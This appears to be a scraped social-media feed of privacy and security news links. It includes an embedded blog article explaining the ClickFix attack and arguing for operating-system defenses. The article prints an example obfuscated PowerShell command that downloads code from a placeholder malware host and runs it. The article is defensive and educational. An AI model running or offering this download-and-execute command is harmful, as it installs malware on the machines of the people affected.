The New Oil

@thenewoil.org

Practical #privacy and simple #cybersecurity for everyone. Articles posted =/= endorsement/agreement. This account no longer monitored. Please contact us […] 🌉 bridged from ⁂ https://mastodon.thenewoil.org/@thenewoil, follow @ap.brid.gy to interact

441
Followers
0
Following
1,214
Posts
06.06.2024
Joined
Latest posts by The New Oil @thenewoil.org

The Government Must Not Force Companies to Participate in #AI-powered #Surveillance

https://www.eff.org/deeplinks/2026/03/government-must-not-force-companies-participate-ai-powered-surveillance

#politics #privacy

13.03.2026 18:00 👍 0 🔁 1 💬 0 📌 0
Preview
New 'Zombie ZIP' technique lets malware slip past security tools A new technique dubbed "Zombie ZIP" helps conceal payloads in compressed files specially created to avoid detection from security solutions such as antivirus and endpoint detection and response (EDR) products.

New '#ZombieZIP' technique lets #malware slip past security tools

https://www.bleepingcomputer.com/news/security/new-zombie-zip-technique-lets-malware-slip-past-security-tools/

#cybersecurity

13.03.2026 17:00 👍 0 🔁 1 💬 0 📌 0
Preview
DHS Ousts CBP Privacy Officers Who Questioned ‘Illegal’ Orders Department of Homeland Security leaders removed top privacy officers who objected to mislabeling government records to block their public release, WIRED has learned.

#DHS Ousts #CBP #Privacy Officers Who Questioned ‘Illegal’ Orders

https://www.wired.com/story/cbp-privacy-threshold-analysis-foia/

#politics

13.03.2026 16:00 👍 2 🔁 0 💬 0 📌 0

#Microsoft #Azure CTO set #Claude on his 1986 #AppleII code, says it found vulns

https://www.theregister.com/2026/03/09/claude_legacy_code_vulns/

#cybersecurity #AI

13.03.2026 15:00 👍 1 🔁 0 💬 0 📌 0
Preview
Microsoft March 2026 Patch Tuesday fixes 2 zero-days, 79 flaws Today is Microsoft's March 2026 Patch Tuesday with security updates for 79 flaws, including 2 publicly disclosed zero-day vulnerabilities.

#Microsoft March 2026 #PatchTuesday fixes 2 zero-days, 79 flaws

https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2026-patch-tuesday-fixes-2-zero-days-79-flaws/

#cybersecurity #Windows

13.03.2026 14:00 👍 0 🔁 0 💬 0 📌 0
Preview
HPE warns of critical AOS-CX flaw allowing admin password resets Hewlett Packard Enterprise (HPE) has patched multiple security vulnerabilities in the Aruba Networking AOS-CX operating system, including several authentication and code execution issues.

#HPE warns of critical #AOSCX flaw allowing admin password resets

https://www.bleepingcomputer.com/news/security/hpe-warns-of-critical-aos-cx-flaw-allowing-admin-password-resets/

#cybersecurity

13.03.2026 13:00 👍 0 🔁 0 💬 0 📌 0
KeePassXC 2.7.12 released – KeePassXC KeePassXC Password Manager

#KeePassXC 2.7.12 released

https://keepassxc.org/blog/2026-03-10-2.7.12-released/

#cybersecurity #FOSS #PasswordManager

13.03.2026 12:00 👍 1 🔁 0 💬 0 📌 0
Preview
Microsoft brings phishing-resistant Windows sign-ins via Entra passkeys Microsoft is rolling out passkey support for Microsoft Entra on Windows devices, adding phishing-resistant passwordless authentication via Windows Hello. [...]

#Microsoft brings #phishing-resistant #Windows sign-ins via #Entra #passkeys

https://www.bleepingcomputer.com/news/microsoft/microsoft-entra-brings-phishing-resistant-sign-in-to-windows/

#cybersecurity

13.03.2026 11:00 👍 1 🔁 0 💬 0 📌 0
Preview
New KadNap botnet hijacks ASUS routers to fuel cybercrime proxy network A newly discovered botnet malware called KadNap is targeting primarily ASUS routers and other edge networking devices to turn them into proxies for malicious traffic.

New #KadNap #botnet hijacks #ASUS routers to fuel #cybercrime #proxy network

https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/

#cybersecurity

13.03.2026 10:00 👍 2 🔁 2 💬 0 📌 0

#YouTube expands #AI #deepfake detection to politicians, government officials, and journalists

https://techcrunch.com/2026/03/10/youtube-expands-ai-deepfake-detection-to-politicians-government-officials-and-journalists/

#privacy

12.03.2026 18:00 👍 1 🔁 0 💬 0 📌 0
Preview
Viral 'Quittr' Porn Addiction App Exposed the Masturbation Habits of Hundreds of Thousands of Users A couple of 20-year-old developers make $500,000 a month promising to help men to stop watching porn, but exposed their private porn watching habits.

Viral '#Quittr' #Porn Addiction App Exposed the Masturbation Habits of Hundreds of Thousands of Users

https://www.404media.co/viral-quittr-porn-addiction-app-exposed-the-masturbation-habits-of-hundreds-of-thousands-of-users/

#nsfw #privacy #cybersecurity #DataBreach

12.03.2026 17:00 👍 0 🔁 1 💬 0 📌 0
Preview
CISA: Recently patched Ivanti EPM flaw now actively exploited CISA flagged a high-severity Ivanti Endpoint Manager (EPM) vulnerability as actively exploited in attacks and ordered U.S. federal agencies to patch systems within three weeks.

CISA: Recently patched #Ivanti #EPM flaw now actively exploited

https://www.bleepingcomputer.com/news/security/cisa-recently-patched-ivanti-epm-flaw-now-actively-exploited/

#cybersecurity

12.03.2026 16:00 👍 0 🔁 0 💬 0 📌 0
Preview
Microsoft to enable Windows hotpatch security updates by default Microsoft will turn on hotpatch security updates by default for all eligible Windows devices managed through Microsoft Intune and the Microsoft Graph API, beginning with the May 2026 Windows security update.

#Microsoft to enable #Windows #hotpatch security updates by default

https://www.bleepingcomputer.com/news/microsoft/microsoft-to-enable-hotpatch-security-updates-by-default-in-may/

#cybersecurity

12.03.2026 15:00 👍 0 🔁 0 💬 0 📌 0
Preview
APT28 hackers deploy customized variant of Covenant open-source tool The Russian state-sponsored APT28 threat group is using a custom variant of the open-source Covenant post-exploitation framework for long-term espionage operations.

#APT28 hackers deploy customized variant of #Covenant #OpenSource tool

https://www.bleepingcomputer.com/news/security/apt28-hackers-deploy-customized-variant-of-covenant-open-source-tool/

#cybersecurity #Russia

12.03.2026 14:00 👍 1 🔁 0 💬 0 📌 0
Preview
Paying without Google: New consortium wants to remove custom ROM hurdles Using banking and payment apps on Android smartphones with custom ROMs is a problem: A European industry consortium now wants to change that.

Paying without #Google: New consortium wants to remove custom #ROM hurdles

https://www.heise.de/en/news/Paying-without-Google-New-consortium-wants-to-remove-custom-ROM-hurdles-11204037.html

#FOSS #OpenSource #Android #privacy #Europe

12.03.2026 13:00 👍 1 🔁 1 💬 0 📌 0
Preview
Microsoft Teams phishing targets employees with backdoors Hackers contacted employees at financial and healthcare organizations over Microsoft Teams to trick them into granting remote access through Quick Assist and deploy a new piece of malware called A0Backdoor.

#Microsoft #Teams #phishing targets employees with #A0Backdoor #malware

https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/

#cybersecurity

12.03.2026 12:00 👍 0 🔁 0 💬 0 📌 0
Preview
Google: Cloud attacks exploit flaws more than weak credentials Hackers are increasingly exploiting newly disclosed vulnerabilities in third-party software to gain initial access to cloud environments, with the window for attacks shrinking from weeks to just days.

Google: Cloud attacks exploit flaws more than weak credentials

https://www.bleepingcomputer.com/news/security/google-cloud-attacks-exploit-flaws-more-than-weak-credentials/

#cybersecurity

12.03.2026 11:00 👍 0 🔁 0 💬 0 📌 0

The #SAFE Act is an Imperfect Vehicle for Real #Section702 Reform

https://www.eff.org/deeplinks/2026/03/safe-act-imperfect-vehicle-real-section-702-reform

#privacy #politics #surveillance #MassSurveillance

12.03.2026 10:00 👍 1 🔁 0 💬 0 📌 0
Preview
addy.io has partnered with EasyOptOuts | addy.io We're excited to share that addy.io has partnered with EasyOptOuts, an automated data removal service that scrubs your name, address, and phone number from 200+ data brokers and people-search sites.

#addy(dot)io has partnered with #EasyOptOuts

https://addy.io/blog/addy-io-has-partnered-with-easyoptouts/

#privacy

11.03.2026 18:00 👍 1 🔁 1 💬 1 📌 0
Preview
Ericsson US discloses data breach after service provider hack Ericsson Inc., the U.S. subsidiary of Swedish networking and telecommunications giant Ericsson, says attackers have stolen data belonging to an undisclosed number of employees and customers after hacking one of its service providers.

#Ericsson US discloses #DataBreach after service provider hack

https://www.bleepingcomputer.com/news/security/ericsson-us-discloses-data-breach-after-service-provider-hack/

#privacy #cybersecurity

11.03.2026 17:00 👍 1 🔁 0 💬 0 📌 0
Preview
ShinyHunters claims ongoing Salesforce Aura data theft attacks Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances.

#ShinyHunters claims ongoing #Salesforce #Aura data theft attacks

https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/

#cybersecurity

11.03.2026 16:00 👍 0 🔁 0 💬 0 📌 0

#SaltTyphoon is hacking the world’s phone and internet giants — here’s everywhere that’s been hit

https://techcrunch.com/2026/03/09/salt-typhoon-china-who-has-been-hacked-global-telecom-giants/

#cybersecurity #China

11.03.2026 15:00 👍 0 🔁 0 💬 1 📌 0
FBI warns of phishing attacks impersonating US city, county officials The Federal Bureau of Investigation (FBI) warns that criminals are impersonating U.S. officials in phishing attacks targeting businesses and individuals who request city and county planning and zoning permits.

#FBI warns of #phishing attacks impersonating US city, county officials

https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/

#cybersecurity

11.03.2026 14:00 👍 0 🔁 0 💬 0 📌 0
Preview
Swiss referendum writes the right to use cash into the national constitution. Swiss vote places right to use cash in country's constitution (www.politico.eu) 05:26 ↑ 103 HN Points

Swiss vote places right to use #cash in country’s constitution

https://www.politico.eu/article/switzerland-cash-right-constitution-vote/

#Switzerland #privacy #PersonalFinance #finance

11.03.2026 13:00 👍 0 🔁 5 💬 0 📌 0
Preview
Privacy International's response to the UK Home Office consultation on facial recognition technology Privacy International submitted a response to the UK Home Office

#PrivacyInternational's response to the #UK #HomeOffice consultation on #FacialRecognition technology

https://privacyinternational.org/advocacy/5741/privacy-internationals-response-uk-home-office-consultation-facial-recognition

#FRT #privacy #surveillance

11.03.2026 12:00 👍 1 🔁 0 💬 0 📌 0
Original post on mastodon.thenewoil.org

#PrivacyInternational & Women on Web - Securing Reproductive Justice: A Guide to Digital #Privacy for Sexual and Reproductive Justice Activists

https://privacyinternational.org/long-read/5742/privacy-international-women-web-securing-reproductive-justice-guide-digital-privacy […]

11.03.2026 11:00 👍 1 🔁 0 💬 0 📌 0
Preview
Privacy International's submission on the impact of digital and AI-assisted surveillance on assembly and association rights

#PrivacyInternational's submission on the impact of digital and #AI-assisted #surveillance on assembly and association rights

https://privacyinternational.org/advocacy/5740/privacy-internationals-submission-impact-digital-and-ai-assisted-surveillance

#privacy #activism #protesting

11.03.2026 10:00 👍 0 🔁 0 💬 0 📌 0
Preview
10 Years of Cryptomator – Thank You All For Cryptomator’s 10th anniversary, we look back at key milestones, celebrate community voices, and share what’s next—including our AMA, new features, and a special anniversary sale.

10 Years of #Cryptomator (Anniversary #Sale)

https://cryptomator.org/blog/2026/03/09/10-years-cryptomator/

#FOSS #cybersecurity

10.03.2026 18:00 👍 0 🔁 1 💬 0 📌 0
Preview
Ubuntu, Fedora, Linux Mint Discuss Age Verification Amid California Law Backlash California's upcoming Digital Age Assurance Act law requires OSes to let users input their birth date during the setup to follow child privacy rules.

#Ubuntu, #Fedora, #LinuxMint Discuss #AgeVerification Amid #California Law Backlash

https://9to5linux.com/ubuntu-fedora-linux-mint-eye-age-verification-amid-california-law-backlash

#Linux #Mint #FOSS #privacy

10.03.2026 17:00 👍 1 🔁 0 💬 0 📌 0
Preview
Fixing ClickFix

There’s a very potent, very effective new malware delivery mechanism dubbed ClickFix, accounting for over half of all infections last year. I’ll tell you how to avoid it – and why you shouldn’t have to.

## What is ClickFix?

We’re getting used to seeing CAPTCHAs that make us do weird things to prove that we’re real humans. (This is becoming increasingly ironic as we deploy “agentic” AI bots to do things on our behalves.) But the bad guys have come up with a devilishly clever way to exploit this and similar situations to trick us into installing malware. The attack is called “ClickFix”, though there are other variants.

So, how does this work? The bad guys need to get you to a malicious web page. This can happen in many ways, from clicking on a malicious ad (called “malvertising”), or a “sponsored” link in search results, or a link from a phishing email – either in the email itself or in an attached file. You may also run across scams like this on shady sites, like for pirated software or movies. But however you get there, you will see some sort of message or error along these lines:

* Please verify that you’re a human (CAPTCHA)
* Browser verification failed
* Additional verification required
* Please run this command to continue
* App has crashed, run this command to scan for problems or fix the issue

An actual ClickFix example is shown below.

[Image: Actual ClickFix example]

## How ClickFix Works

When you’re in a web browser on a desktop computer, you have several layers of protection. Browsers are “sandboxed” and can’t directly run commands on your computer. Most have some sort of download protections, including marking any file downloaded from the internet with a “mark of the web”. This mark tells your computer to be extra careful when opening these documents, particularly if they try to install something or run commands. And some of us have third party antivirus software (though I don’t recommend this) that would also try to prevent you from downloading malware.

But ClickFix works by tricking you into bypassing all of these protections. Let’s look at the example above. Here’s what is actually going on.

1. The malicious web page that shows this message has automatically loaded your system clipboard with a computer command. That is, the page has surreptitiously copied some hidden text so that it’s ready to paste.
2. The “Win + R” key combination on a Windows computer will open up a Run dialog which allows you to execute commands as text (as opposed to the usual graphical user interface).
3. The “Ctrl + V” key combination will paste the contents of the clipboard into the Run dialog. This is the malicious computer command that was pre-copied to the clipboard when you visited the attacker’s web page.
4. And finally, hitting “Enter” will tell your computer to execute the malicious command.

The command itself is often obfuscated so it’s difficult to tell what it’s really doing. Here’s an example command:

```powershell
powershell -NoP -W Hidden -C $a="https://mal"; $b="waresite.com/update"; $u=$a+$b; iex (irm $u) # browser verification step
```

This command opens a (hidden) PowerShell window, downloads a malicious command from a website (which is obfuscated by breaking it into two parts) and executes the command. You’ve just told your computer to install malware, which it will happily do. If the command is really long, like this one, it will scroll to the end and all you might see is the benign-looking comment at the end.

You might also be asked to open File Explorer because you can paste and run commands in the address bar. On a Mac, you’d be asked to open a Terminal window instead of a Run dialog. All different ways to do the same thing.

## Fixing ClickFix

So, now that you know how this works, the solution is to just ignore the directions like this, no matter how authentic they look or how dire or innocuous they sound. Close the web page and pat yourself on the back.

But here’s the bottom line: you shouldn’t _have_ to worry about this. This is a failing of the operating system (OS). Apple and Microsoft need to address this problem in macOS and Windows, and they should do it ASAP. How? I can think of a few ideas…

1. Everything copied to the clipboard (anything that can be subsequently pasted) should know and remember where it came from. Any text placed on your clipboard by a website should be flagged as suspicious (like the ‘mark of the web’). Your OS should then warn you before pasting this text into a Run dialog, Terminal window, or anywhere else that could execute a computer command.
2. You should have an easy way to inspect the content of your clipboard (without having to paste it somewhere), including the provenance of what’s stored there.
3. Web browsers should not be able to automatically put text on your clipboard without any user action whatsoever. It should at least be a setting you can toggle (defaulting to not allowing it).

People that do a lot of computer programming copy and paste commands to run all the time. I know I do. So we would need some ways to disable constant warnings in those cases, maybe for a limited amount of time (‘stop warning me for 2 hours’). But by default, the OS should be making it a lot harder to paste commands from the web into a terminal and execute them. We should not be counting on training billions of people to avoid ClickFix-style attacks.

Fixing #ClickFix

https://firewallsdontstopdragons.com/fixing-clickfix/

#cybersecurity #guide

10.03.2026 16:00 👍 0 🔁 0 💬 0 📌 0